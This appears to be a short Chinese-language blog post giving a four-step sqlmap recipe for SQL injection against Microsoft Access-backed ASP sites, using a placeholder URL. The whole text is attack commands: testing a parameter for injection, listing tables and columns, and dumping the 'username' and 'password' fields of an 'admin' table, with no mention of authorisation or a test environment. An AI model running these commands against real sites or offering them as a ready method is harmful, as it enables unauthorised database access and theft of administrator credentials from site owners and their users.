sqlmap:Access数据库注入思路

固若金汤 (3310) 2023-12-20 10:31:01

1.判断注入的是否存在注入漏洞

sqlmap -u "http://www.xxx.com/xx.asp?id=xxx"
root@huc:~# sqlmap -u(-u:指定一个URL) "http://www.xxx.com/xx.asp?id=xxx"

2.获取表名

sqlmap -u “http://www.xxx.com/xx.asp?id=xxx” --tables
root@huc:~# sqlmap -u "http://www.xxx.com/xx.asp?id=xxx" --tables

3.获取字段名

sqlmap -u “http://www.xxx.com/xx.asp?id=xxx” --columns -T 表名
root@huc:~# sqlmap -u "http://www.xxx.com/xx.asp?id=xxx" --columns -T admin

4.获取字段中的内容

sqlmap -u “http://www.xxx.com/xx.asp?id=xxx” --dump -T 表名 -C "字段名1,字段名2..."
root@huc:~# sqlmap -u "http://www.xxx.com/xx.asp?id=xxx" --dump -T admin -C "username,password"
THE END

发表评论